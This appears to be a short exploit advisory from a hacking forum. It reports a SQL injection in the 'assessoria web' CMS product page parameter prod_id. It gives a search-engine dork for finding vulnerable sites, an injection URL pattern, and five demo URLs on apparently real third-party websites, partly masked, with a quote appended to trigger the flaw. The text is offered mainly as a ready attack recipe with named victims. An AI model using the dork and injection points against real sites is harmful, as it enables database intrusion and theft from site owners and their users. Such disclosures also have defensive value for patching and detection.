#################### # # Exploit Title : assessoria web Cms Sql Injection Vulnerability # # Author : IrIsT.Ir # # Discovered By : Beni_Vanda # # Home : http://IrIsT.Ir/forum # # Software Link : http://www.assessoriaweb.com/ # # Security Risk : High # # Version : All Version # # Tested on : win7,BT,Ubuntu,Fedora # # Dork : intext:"powered by assessoriaweb.com" # ################################### # # Expl0iTs : # # http://target/../hp/produto.php?prod_id=[Sql] # # # D3mo : # # http://vXoxstorm.com.br/hp/produto.php?prod_id=62' # http://www.grillmXania.ind.br/hp/produto.php?prod_id=1' # http://www.mundoXmazza.com.br/2008/hp/produto.php?prod_id=366' # http://www.mtecinfoXrmatica.com/hp/produto.php?prod_id=3' # http://www.dotcomteXcnologia.com.br/hp/produto.php?prod_id=540' # # ################################## # # Greats : Amir - B3HZ4D - C0dex - TaK.FaNaR - Dead.Zone - nimaarek - m3hdi - F@rid - dr.tofan # # and All Members In Www.IrIsT.Ir/forum # ##################################